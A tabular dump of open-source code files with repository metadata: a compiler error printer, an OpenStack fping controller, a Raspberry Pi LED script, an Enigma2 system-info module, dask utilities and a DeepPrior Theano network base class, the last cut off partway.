Dataset schema (one record per row below): repo_name (string, length 5–92) | path (string, length 4–221) | copies (string, 19 classes) | size (string, length 4–6) | content (string, length 766–896k) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class)

| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
sssstest/GameEditor
|
dejavu/driver.py
|
1
|
1128
|
#!/usr/bin/env python
from __future__ import print_function
class build_log():
def append(self, c):
print(c,end="")
def message(self, c):
print(c)
def percent(self, i):
print(i)
class error_printer():#error_stream
def __init__(self, log):
self.log=log
self.errors = 0
self.context = "<untitled>"
def set_context(self, c):
self.context = c
def count(self):
return self.errors
def error(self, e):
s = self.context + ":" + str(e.unexpected.row) + ":" + str(e.unexpected.col) + ": " + "error: unexpected '" +str(e.unexpected) + "'; expected "
if e.expected:
s += e.expected
else:
s += e.expected_token
s += "\n"
self.log.append(s)
		self.log.append(self.parser.lexer.source.split("\n")[e.unexpected.row-1]+"\n") # assumes self.parser is attached by the owning parser
self.log.append(" "*(e.unexpected.col-1)+"^\n")
self.errors+=1
		raise Exception(s) # abort compilation after reporting the error
def error_string(self, e):
self.log.append(e)
self.errors+=1
	def progress(self, i, n=""):
		self.log.percent(i)
		if n:
			self.log.message(n)
	def compile(self, target, source, log):
		errors = error_printer(log)
		# linker and getHostTriple are assumed to be provided elsewhere in the package
		return linker(source, getHostTriple(), errors).build(target)
|
gpl-3.0
| -8,586,504,180,212,668,000
| 20.283019
| 145
| 0.631206
| false
| 2.666667
| false
| false
| false
|
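The `error_printer` above builds a clang-style caret diagnostic: a `context:row:col` prefix, the message, the offending source line, then a `^` under the failing column. A minimal standalone sketch of that formatting step (the sample source string is hypothetical):

```python
from __future__ import print_function


def caret_diagnostic(context, source, row, col, message):
    """Format a diagnostic the way error_printer.error() above does."""
    line = source.split("\n")[row - 1]          # row is 1-based
    header = "{}:{}:{}: error: {}".format(context, row, col, message)
    return "\n".join([header, line, " " * (col - 1) + "^"])


source = "let x = ;"
print(caret_diagnostic("<untitled>", source, 1, 9, "unexpected ';'"))
# <untitled>:1:9: error: unexpected ';'
# let x = ;
#         ^
```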
HybridF5/jacket
|
jacket/api/compute/openstack/compute/fping.py
|
1
|
4989
|
# Copyright 2011 Grid Dynamics
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
from oslo_config import cfg
import six
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-fping"
authorize = extensions.os_compute_authorizer(ALIAS)
CONF = cfg.CONF
CONF.import_opt('fping_path', 'jacket.api.compute.openstack.compute.legacy_v2.contrib.'
'fping')
class FpingController(wsgi.Controller):
def __init__(self, network_api=None):
self.compute_api = cloud.API(skip_policy_check=True)
self.last_call = {}
def check_fping(self):
if not os.access(CONF.fping_path, os.X_OK):
raise exc.HTTPServiceUnavailable(
explanation=_("fping utility is not found."))
@staticmethod
def fping(ips):
fping_ret = utils.execute(CONF.fping_path, *ips,
check_exit_code=False)
if not fping_ret:
return set()
alive_ips = set()
for line in fping_ret[0].split("\n"):
ip = line.split(" ", 1)[0]
if "alive" in line:
alive_ips.add(ip)
return alive_ips
@staticmethod
def _get_instance_ips(context, instance):
ret = []
for network in common.get_networks_for_instance(
context, instance).values():
all_ips = itertools.chain(network["ips"], network["floating_ips"])
ret += [ip["address"] for ip in all_ips]
return ret
@extensions.expected_errors(503)
def index(self, req):
context = req.environ["compute.context"]
search_opts = dict(deleted=False)
if "all_tenants" in req.GET:
authorize(context, action='all_tenants')
else:
authorize(context)
if context.project_id:
search_opts["project_id"] = context.project_id
else:
search_opts["user_id"] = context.user_id
self.check_fping()
include = req.GET.get("include", None)
if include:
include = set(include.split(","))
exclude = set()
else:
include = None
exclude = req.GET.get("exclude", None)
if exclude:
exclude = set(exclude.split(","))
else:
exclude = set()
instance_list = self.compute_api.get_all(
context, search_opts=search_opts, want_objects=True)
ip_list = []
instance_ips = {}
instance_projects = {}
for instance in instance_list:
uuid = instance.uuid
if uuid in exclude or (include is not None and
uuid not in include):
continue
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
instance_ips[uuid] = ips
instance_projects[uuid] = instance.project_id
ip_list += ips
alive_ips = self.fping(ip_list)
res = []
for instance_uuid, ips in six.iteritems(instance_ips):
res.append({
"id": instance_uuid,
"project_id": instance_projects[instance_uuid],
"alive": bool(set(ips) & alive_ips),
})
return {"servers": res}
@extensions.expected_errors((404, 503))
def show(self, req, id):
context = req.environ["compute.context"]
authorize(context)
self.check_fping()
instance = common.get_instance(self.compute_api, context, id)
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
alive_ips = self.fping(ips)
return {
"server": {
"id": instance.uuid,
"project_id": instance.project_id,
"alive": bool(set(ips) & alive_ips),
}
}
class Fping(extensions.V21APIExtensionBase):
"""Fping Management Extension."""
name = "Fping"
alias = ALIAS
version = 1
def get_resources(self):
res = extensions.ResourceExtension(ALIAS, FpingController())
return [res]
def get_controller_extensions(self):
return []
|
apache-2.0
| -2,104,035,560,630,013,200
| 31.607843
| 87
| 0.585288
| false
| 4.020145
| false
| false
| false
|
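The `fping` static method above keys off the literal word `alive` in fping's per-host output and takes the first whitespace-delimited token as the IP. That parsing step in isolation, as a minimal sketch (the sample lines are hypothetical but follow fping's usual `<ip> is alive` / `<ip> is unreachable` shape):

```python
def parse_fping(output):
    """Collect IPs reported as alive, as FpingController.fping() above does."""
    alive = set()
    for line in output.split("\n"):
        ip = line.split(" ", 1)[0]   # first token on the line is the IP
        if "alive" in line:
            alive.add(ip)
    return alive


sample = "10.0.0.1 is alive\n10.0.0.2 is unreachable\n10.0.0.3 is alive"
print(sorted(parse_fping(sample)))   # ['10.0.0.1', '10.0.0.3']
```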
mueckl/raspberry_nagios_alert
|
scripts/red.led.py
|
1
|
1090
|
import RPi.GPIO as GPIO
import os.path
from time import sleep
import sys
# use P1 header pin numbering convention
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM)
pin=23
# Set up the GPIO channels - one input and one output
#GPIO.setup(11, GPIO.IN)
GPIO.setup(pin, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(11)
# Output to pin 12
GPIO.output(pin, GPIO.LOW)
# The same script as above but using BCM GPIO 00..nn numbers
#GPIO.setmode(GPIO.BCM)
# Set up the GPIO channels - one input and one output
#GPIO.setup(17, GPIO.IN)
#GPIO.setup(18, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(17)
# Output to pin 12
#GPIO.output(18, GPIO.HIGH)
fname="/dev/shm/red.led"
onoff=0
while True:
if os.path.isfile(fname):
with open(fname) as f:
content = f.readlines()
for number in content:
onoff=(onoff+1)%2;
if (onoff==1):
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
sleep(float(number))
GPIO.output(pin, GPIO.LOW)
else:
sleep(0.5)
|
mit
| -1,505,786,839,147,413,000
| 19.185185
| 60
| 0.640367
| false
| 2.945946
| false
| false
| false
|
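The loop above treats `/dev/shm/red.led` as a blink pattern: each line holds a float duration, and the LED toggles once per line, ending LOW. A hardware-free sketch of the same state machine under that file-format assumption (substitute `GPIO.output(pin, ...)` for the prints on a real board):

```python
from time import sleep


def blink(durations):
    """Toggle an LED once per duration, mirroring the red.led loop above."""
    onoff = 0
    for number in durations:
        onoff = (onoff + 1) % 2
        print("LED", "HIGH" if onoff == 1 else "LOW")  # GPIO.output(pin, ...) on hardware
        sleep(float(number))
    print("LED", "LOW")                                # always finish with the LED off


blink(["0.2", "0.2", "0.5"])   # on 0.2s, off 0.2s, on 0.5s, then off
```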
oostende/openblachole
|
lib/python/Components/About.py
|
2
|
4196
|
from boxbranding import getImageVersion, getMachineBuild
from sys import modules
import socket, fcntl, struct
def getVersionString():
return getImageVersion()
def getFlashDateString():
try:
f = open("/etc/install","r")
flashdate = f.read()
f.close()
return flashdate
except:
return _("unknown")
def getEnigmaVersionString():
return getImageVersion()
def getGStreamerVersionString():
import enigma
return enigma.getGStreamerVersionString()
def getKernelVersionString():
try:
f = open("/proc/version","r")
kernelversion = f.read().split(' ', 4)[2].split('-',2)[0]
f.close()
return kernelversion
except:
return _("unknown")
def getChipSetString():
try:
f = open('/proc/stb/info/chipset', 'r')
chipset = f.read()
f.close()
return str(chipset.lower().replace('\n','').replace('bcm','').replace('brcm',''))
except IOError:
return _("unavailable")
def getCPUSpeedString():
cpu_speed = 0
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
file.close()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("cpu MHz"):
cpu_speed = float(splitted[1].split(' ')[0])
break
except IOError:
print "[About] getCPUSpeedString, /proc/cpuinfo not available"
if cpu_speed == 0:
if getMachineBuild() in ('hd51','hd52'):
import binascii
f = open('/sys/firmware/devicetree/base/cpus/cpu@0/clock-frequency', 'rb')
clockfrequency = f.read()
f.close()
cpu_speed = round(int(binascii.hexlify(clockfrequency), 16)/1000000,1)
else:
try: # Solo4K
file = open('/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq', 'r')
cpu_speed = float(file.read()) / 1000
file.close()
except IOError:
print "[About] getCPUSpeedString, /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq not available"
if cpu_speed > 0:
if cpu_speed >= 1000:
cpu_speed = "%s GHz" % str(round(cpu_speed/1000,1))
else:
cpu_speed = "%s MHz" % str(round(cpu_speed,1))
return cpu_speed
return _("unavailable")
def getCPUString():
system = _("unavailable")
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("system type"):
system = splitted[1].split(' ')[0]
elif splitted[0].startswith("model name"):
system = splitted[1].split(' ')[0]
file.close()
return system
except IOError:
return _("unavailable")
def getCpuCoresString():
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("processor"):
if int(splitted[1]) > 0:
cores = 2
else:
cores = 1
file.close()
return cores
except IOError:
return _("unavailable")
def _ifinfo(sock, addr, ifname):
iface = struct.pack('256s', ifname[:15])
info = fcntl.ioctl(sock.fileno(), addr, iface)
if addr == 0x8927:
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1].upper()
else:
return socket.inet_ntoa(info[20:24])
def getIfConfig(ifname):
ifreq = {'ifname': ifname}
infos = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# offsets defined in /usr/include/linux/sockios.h on linux 2.6
infos['addr'] = 0x8915 # SIOCGIFADDR
infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR
infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR
infos['netmask'] = 0x891b # SIOCGIFNETMASK
try:
for k,v in infos.items():
ifreq[k] = _ifinfo(sock, v, ifname)
except:
pass
sock.close()
return ifreq
def getIfTransferredData(ifname):
f = open('/proc/net/dev', 'r')
for line in f:
if ifname in line:
data = line.split('%s:' % ifname)[1].split()
rx_bytes, tx_bytes = (data[0], data[8])
f.close()
return rx_bytes, tx_bytes
def getPythonVersionString():
try:
import commands
status, output = commands.getstatusoutput("python -V")
return output.split(' ')[1]
except:
return _("unknown")
# For modules that do "from About import about"
about = modules[__name__]
|
gpl-2.0
| 9,068,916,219,085,860,000
| 25.225
| 106
| 0.651096
| false
| 2.8294
| false
| false
| false
|
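`_ifinfo` above drives the Linux `SIOCGIFADDR`/`SIOCSIFHWADDR` ioctls directly through a packed 256-byte `ifreq` buffer. A Python 3 sketch of the same address lookup (Linux only; `eth0` is an assumed interface name):

```python
import fcntl
import socket
import struct

SIOCGIFADDR = 0x8915  # same offset table as getIfConfig() above


def ipv4_address(ifname):
    """Return the IPv4 address bound to a Linux interface via ioctl."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        ifreq = struct.pack('256s', ifname[:15].encode())  # ifreq wants bytes in Python 3
        info = fcntl.ioctl(s.fileno(), SIOCGIFADDR, ifreq)
        return socket.inet_ntoa(info[20:24])               # address sits at bytes 20..23
    finally:
        s.close()


# print(ipv4_address('eth0'))  # e.g. '192.168.1.10' on a machine with eth0
```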
PhE/dask
|
dask/utils.py
|
1
|
8629
|
from __future__ import absolute_import, division, print_function
from collections import Iterator
from contextlib import contextmanager
from errno import ENOENT
from functools import partial
import os
import sys
import shutil
import struct
import gzip
import tempfile
import inspect
from .compatibility import unicode, long
def raises(err, lamda):
try:
lamda()
return False
except err:
return True
def deepmap(func, *seqs):
""" Apply function inside nested lists
>>> inc = lambda x: x + 1
>>> deepmap(inc, [[1, 2], [3, 4]])
[[2, 3], [4, 5]]
>>> add = lambda x, y: x + y
>>> deepmap(add, [[1, 2], [3, 4]], [[10, 20], [30, 40]])
[[11, 22], [33, 44]]
"""
if isinstance(seqs[0], (list, Iterator)):
return [deepmap(func, *items) for items in zip(*seqs)]
else:
return func(*seqs)
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
@contextmanager
def tmpfile(extension='', dir=None):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension, dir=dir)
os.close(handle)
os.remove(filename)
try:
yield filename
finally:
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
@contextmanager
def filetext(text, extension='', open=open, mode='w'):
with tmpfile(extension=extension) as filename:
f = open(filename, mode=mode)
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield filename
def repr_long_list(seq):
"""
>>> repr_long_list(list(range(100)))
'[0, 1, 2, ..., 98, 99]'
"""
if len(seq) < 8:
return repr(seq)
else:
return repr(seq[:3])[:-1] + ', ..., ' + repr(seq[-2:])[1:]
class IndexCallable(object):
""" Provide getitem syntax for functions
>>> def inc(x):
... return x + 1
>>> I = IndexCallable(inc)
>>> I[3]
4
"""
__slots__ = 'fn',
def __init__(self, fn):
self.fn = fn
def __getitem__(self, key):
return self.fn(key)
@contextmanager
def filetexts(d, open=open):
""" Dumps a number of textfiles to disk
d - dict
a mapping from filename to text like {'a.csv': '1,1\n2,2'}
"""
for filename, text in d.items():
f = open(filename, 'wt')
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield list(d)
for filename in d:
if os.path.exists(filename):
os.remove(filename)
opens = {'gzip': gzip.open}
def textblock(file, start, stop, compression=None):
""" Pull out a block of text from a file given start and stop bytes
This gets data starting/ending from the next newline delimiter
Example
-------
>> with open('myfile.txt', 'w') as f:
.. f.write('123\n456\n789\nabc')
>> f = open('myfile.txt')
In the example below, 1 and 10 don't line up with endlines
>> textblock(f, 1, 10)
'456\n789\n'
"""
if isinstance(file, (str, unicode)):
myopen = opens.get(compression, open)
f = myopen(file, 'rb')
try:
result = textblock(f, start, stop)
finally:
f.close()
return result
if start:
file.seek(start - 1)
line = file.readline() # burn a line
start = file.tell()
if stop is None:
file.seek(start)
return file.read()
stop -= 1
file.seek(stop)
line = file.readline()
stop = file.tell()
file.seek(start)
return file.read(stop - start)
def concrete(seq):
""" Make nested iterators concrete lists
>>> data = [[1, 2], [3, 4]]
>>> seq = iter(map(iter, data))
>>> concrete(seq)
[[1, 2], [3, 4]]
"""
if isinstance(seq, Iterator):
seq = list(seq)
if isinstance(seq, (tuple, list)):
seq = list(map(concrete, seq))
return seq
def skip(func):
pass
def pseudorandom(n, p, key):
""" Pseudorandom array of integer indexes
>>> pseudorandom(5, [0.5, 0.5], key=123)
array([1, 0, 0, 1, 1], dtype=int8)
>>> pseudorandom(10, [0.5, 0.2, 0.2, 0.1], key=5)
array([0, 2, 0, 3, 0, 1, 2, 1, 0, 0], dtype=int8)
"""
import numpy as np
p = list(p)
cp = np.cumsum([0] + p)
assert np.allclose(1, cp[-1])
assert len(p) < 256
x = np.random.RandomState(key).random_sample(n)
out = np.empty(n, dtype='i1')
for i, (low, high) in enumerate(zip(cp[:-1], cp[1:])):
out[(x >= low) & (x < high)] = i
return out
def getargspec(func):
"""Version of inspect.getargspec that works for functools.partial objects"""
if isinstance(func, partial):
return inspect.getargspec(func.func)
else:
if isinstance(func, type):
return inspect.getargspec(func.__init__)
else:
return inspect.getargspec(func)
def is_integer(i):
"""
>>> is_integer(6)
True
>>> is_integer(42.0)
True
>>> is_integer('abc')
False
"""
import numpy as np
if isinstance(i, (int, long)):
return True
if isinstance(i, float):
return (i).is_integer()
    if issubclass(type(i), np.integer):
        return True
else:
return False
def file_size(fn, compression=None):
""" Size of a file on disk
If compressed then return the uncompressed file size
"""
if compression == 'gzip':
with open(fn, 'rb') as f:
f.seek(-4, 2)
result = struct.unpack('I', f.read(4))[0]
else:
result = os.stat(fn).st_size
return result
ONE_ARITY_BUILTINS = set([abs, all, any, bool, bytearray, bytes, callable, chr,
classmethod, complex, dict, dir, enumerate, eval, float, format, frozenset,
hash, hex, id, int, iter, len, list, max, min, next, oct, open, ord, range,
repr, reversed, round, set, slice, sorted, staticmethod, str, sum, tuple,
type, vars, zip])
if sys.version_info[0] == 3: # Python 3
ONE_ARITY_BUILTINS |= set([ascii])
if sys.version_info[:2] != (2, 6):
ONE_ARITY_BUILTINS |= set([memoryview])
MULTI_ARITY_BUILTINS = set([compile, delattr, divmod, filter, getattr, hasattr,
isinstance, issubclass, map, pow, setattr])
def takes_multiple_arguments(func):
""" Does this function take multiple arguments?
>>> def f(x, y): pass
>>> takes_multiple_arguments(f)
True
>>> def f(x): pass
>>> takes_multiple_arguments(f)
False
>>> def f(x, y=None): pass
>>> takes_multiple_arguments(f)
False
>>> def f(*args): pass
>>> takes_multiple_arguments(f)
True
>>> class Thing(object):
... def __init__(self, a): pass
>>> takes_multiple_arguments(Thing)
False
"""
if func in ONE_ARITY_BUILTINS:
return False
elif func in MULTI_ARITY_BUILTINS:
return True
try:
spec = getargspec(func)
except:
return False
try:
is_constructor = spec.args[0] == 'self' and isinstance(func, type)
except:
is_constructor = False
if spec.varargs:
return True
if spec.defaults is None:
return len(spec.args) - is_constructor != 1
return len(spec.args) - len(spec.defaults) - is_constructor > 1
class Dispatch(object):
"""Simple single dispatch."""
def __init__(self):
self._lookup = {}
def register(self, type, func):
"""Register dispatch of `func` on arguments of type `type`"""
if isinstance(type, tuple):
for t in type:
self.register(t, func)
else:
self._lookup[type] = func
def __call__(self, arg):
# We dispatch first on type(arg), and fall back to iterating through
# the mro. This is significantly faster in the common case where
# type(arg) is in the lookup, with only a small penalty on fall back.
lk = self._lookup
typ = type(arg)
if typ in lk:
return lk[typ](arg)
for cls in inspect.getmro(typ)[1:]:
if cls in lk:
return lk[cls](arg)
raise TypeError("No dispatch for {0} type".format(typ))
def ensure_not_exists(filename):
"""
Ensure that a file does not exist.
"""
try:
os.unlink(filename)
except OSError as e:
if e.errno != ENOENT:
raise
|
bsd-3-clause
| -3,181,018,165,780,446,000
| 22.576503
| 80
| 0.560436
| false
| 3.586451
| false
| false
| false
|
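The trickiest helper above is `textblock`, which snaps a byte range to newline boundaries: burn the partial line before `start`, then extend `stop` to the end of its line. A trimmed-down, self-contained sketch of that seek logic against an in-memory file (the `stop is None` branch is omitted here):

```python
import io


def newline_block(f, start, stop):
    """Bytes from the first full line at/after `start` through the line containing `stop`."""
    if start:
        f.seek(start - 1)
        f.readline()          # burn the partial line before `start`
        start = f.tell()
    f.seek(stop - 1)
    f.readline()              # extend `stop` to the next newline
    stop = f.tell()
    f.seek(start)
    return f.read(stop - start)


f = io.BytesIO(b"123\n456\n789\nabc")
print(newline_block(f, 1, 10))   # b'456\n789\n', matching the docstring example above
```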
moberweger/deep-prior
|
src/net/netbase.py
|
1
|
17161
|
"""Provides NetBase class for generating networks from configurations.
NetBase provides interface for building CNNs.
It should be inherited by all network classes in order to provide
basic functionality, ie computing outputs, creating computational
graph, managing dropout, etc.
NetBaseParams is the parametrization of these NetBase networks.
Copyright 2015 Markus Oberweger, ICG,
Graz University of Technology <oberweger@icg.tugraz.at>
This file is part of DeepPrior.
DeepPrior is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
DeepPrior is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with DeepPrior. If not, see <http://www.gnu.org/licenses/>.
"""
import difflib
import gzip
import time
import numpy
import cPickle
import re
import theano
import theano.tensor as T
from net.convpoollayer import ConvPoolLayer, ConvPoolLayerParams
from net.convlayer import ConvLayer, ConvLayerParams
from net.hiddenlayer import HiddenLayer, HiddenLayerParams
from net.poollayer import PoolLayer, PoolLayerParams
from net.dropoutlayer import DropoutLayer, DropoutLayerParams
__author__ = "Markus Oberweger <oberweger@icg.tugraz.at>"
__copyright__ = "Copyright 2015, ICG, Graz University of Technology, Austria"
__credits__ = ["Paul Wohlhart", "Markus Oberweger"]
__license__ = "GPL"
__version__ = "1.0"
__maintainer__ = "Markus Oberweger"
__email__ = "oberweger@icg.tugraz.at"
__status__ = "Development"
class NetBaseParams(object):
def __init__(self):
"""
Init the parametrization
"""
self.numInputs = 1
self.numOutputs = 1
self.layers = []
self.inputDim = None
self.outputDim = None
def getMemoryRequirement(self):
"""
Get memory requirements of weights
:return: memory requirement
"""
mem = 0
for l in self.layers:
mem += l.getMemoryRequirement()
return mem
class NetBase(object):
def __init__(self, rng, inputVar, cfgParams, twin=None):
"""
Initialize object by constructing the layers
:param rng: random number generator
:param inputVar: input variable
:param cfgParams: parameters
        :param twin: network to copy layer weights from @deprecated
:return: None
"""
self._params_filter = []
self._weights_filter = []
self.inputVar = inputVar
self.cfgParams = cfgParams
self.rng = rng
# create network
self.layers = []
i = 0
for layerParam in cfgParams.layers:
# first input is inputVar, otherwise input is output of last one
if i == 0:
inp = inputVar
else:
# flatten output from conv to hidden layer and reshape from hidden to conv layer
if (len(self.layers[-1].cfgParams.outputDim) == 4) and (len(layerParam.inputDim) == 2):
inp = self.layers[-1].output.flatten(2)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
elif (len(layerParam.inputDim) == 4) and (len(self.layers[-1].cfgParams.outputDim) == 2):
inp = T.reshape(self.layers[-1].output, layerParam.inputDim, ndim=4)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
else:
inp = self.layers[-1].output
id = layerParam.__class__.__name__[:-6]
constructor = globals()[id]
self.layers.append(constructor(rng,
inputVar=inp,
cfgParams=layerParam,
copyLayer=None if (twin is None) else twin.layers[i],
layerNum=i))
i += 1
# assemble externally visible parameters
self.output = self.layers[-1].output
# TODO test
        # Nguyen-Widrow initialization
# for l in range(len(self.layers)):
# if isinstance(self.layers[l], HiddenLayer) or isinstance(self.layers[l], HiddenLayerInv):
# if l > 0:
# self.resetWeightsNW(rng, self.layers[l-1].cfgParams.getOutputRange(), self.layers[l], self.layers[l].cfgParams.getOutputRange())
# else:
# self.resetWeightsNW(rng, [-1, 1], self.layers[l], self.layers[l].cfgParams.getOutputRange())
def __str__(self):
"""
prints the parameters of the layers of the network
:return: configuration string
"""
cfg = "Network configuration:\n"
i = 0
for l in self.layers:
cfg += "Layer {}: {} with {} \n".format(i, l.__class__.__name__, l)
i += 1
return cfg
@property
def params(self):
"""
Get a list of the learnable theano parameters for this network.
:return: list of theano variables
"""
# remove filtered params
if not hasattr(self, '_params_filter'):
self._params_filter = []
prms = [p for l in self.layers for p in l.params if p.name not in self._params_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def params_filter(self):
return self._params_filter
@params_filter.setter
def params_filter(self, bl):
names = [p.name for l in self.layers for p in l.params]
for b in bl:
if b not in names:
raise UserWarning("Param {} not in model!".format(b))
self._params_filter = bl
@property
def weights(self):
"""
Get a list of the weights for this network.
:return: list of theano variables
"""
# remove filtered weights
if not hasattr(self, '_weights_filter'):
self._weights_filter = []
prms = [p for l in self.layers for p in l.weights if p.name not in self._weights_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def weights_filter(self):
return self._weights_filter
@weights_filter.setter
def weights_filter(self, bl):
names = [p.name for l in self.layers for p in l.weights]
for b in bl:
if b not in names:
raise UserWarning("Weight {} not in model!".format(b))
self._weights_filter = bl
def computeOutput(self, inputs, timeit=False):
"""
compute the output of the network for given input
:param inputs: input data
:param timeit: print the timing information
:return: output of the network
"""
# Convert input data
if not isinstance(inputs, list):
inputs = [inputs]
# All data must be same
assert all(i.shape[0] == inputs[0].shape[0] for i in inputs[1:])
if self.dropoutEnabled():
print("WARNING: dropout is enabled in at least one layer for testing, DISABLING")
self.disableDropout()
floatX = theano.config.floatX # @UndefinedVariable
batch_size = self.cfgParams.batch_size
nSamp = inputs[0].shape[0]
padSize = int(batch_size * numpy.ceil(nSamp / float(batch_size)))
out = []
if isinstance(self.output, list):
for i in range(len(self.output)):
outSize = list(self.cfgParams.outputDim[i])
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
else:
outSize = list(self.cfgParams.outputDim)
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
index = T.lscalar('index')
if not hasattr(self, 'compute_output'):
self.input_data = []
self.input_givens = dict()
input_pad = []
if inputs[0].shape[0] < batch_size:
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]] = inputs[k][0:inputs[k].shape[0]]
input_pad[k][inputs[k].shape[0]:] = inputs[k][-1]
else:
for k in range(len(inputs)):
input_pad.append(inputs[k])
for i in range(len(inputs)):
if len(inputs) == 1 and not isinstance(self.inputVar, list):
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar.name, borrow=True))
self.input_givens[self.inputVar] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
else:
assert isinstance(self.inputVar, list)
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar[i].name, borrow=True))
self.input_givens[self.inputVar[i]] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
print("compiling compute_output() ...")
self.compute_output = theano.function(inputs=[index], outputs=self.output, givens=self.input_givens,
mode='FAST_RUN', on_unused_input='warn')
print("done")
# iterate to save memory
n_test_batches = padSize / batch_size
start = time.time()
for i in range(n_test_batches):
# pad last batch to batch size
if i == n_test_batches-1:
input_pad = []
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]-i*batch_size] = inputs[k][i*batch_size:]
input_pad[k][inputs[k].shape[0]-i*batch_size:] = inputs[k][-1]
for k in range(len(inputs)):
self.input_data[k].set_value(input_pad[k], borrow=True)
else:
for k in range(len(inputs)):
self.input_data[k].set_value(inputs[k][i * batch_size:(i + 1) * batch_size], borrow=True)
o = self.compute_output(0)
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k][i * batch_size:(i + 1) * batch_size] = o[k]
else:
out[0][i * batch_size:(i + 1) * batch_size] = o.reshape(self.cfgParams.outputDim)
end = time.time()
if timeit:
print("{} in {}s, {}ms per frame".format(padSize, end - start, (end - start)*1000./padSize))
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k] = out[k][0:nSamp]
return out
else:
return out[0][0:nSamp]
def enableDropout(self):
"""
Enables dropout in all dropout layers, ie for training
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.enableDropout()
def disableDropout(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.disableDropout()
def dropoutEnabled(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
if layer.dropoutEnabled():
return True
return False
def hasDropout(self):
"""
Checks if network has dropout layers
:return: True if there are dropout layers
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
return True
return False
@property
def weightVals(self):
"""
Returns list of the weight values
:return: list of weight values
"""
return self.recGetWeightVals(self.params)
@weightVals.setter
def weightVals(self, value):
"""
Set weights with given values
:param value: values for weights
:return: None
"""
self.recSetWeightVals(self.params, value)
def recSetWeightVals(self, param, value):
"""
Set weights with given values
:param param: layer parameters listing the layers weights
:param value: values for weights
:return: None
"""
if isinstance(value, list):
assert isinstance(param, list), "tried to assign a list of weights to params, which is not a list {}".format(type(param))
assert len(param) == len(value), "tried to assign unequal list of weights {} != {}".format(len(param), len(value))
for i in xrange(len(value)):
self.recSetWeightVals(param[i], value[i])
else:
param.set_value(value)
def recGetWeightVals(self, param):
"""
Returns list of the weight values
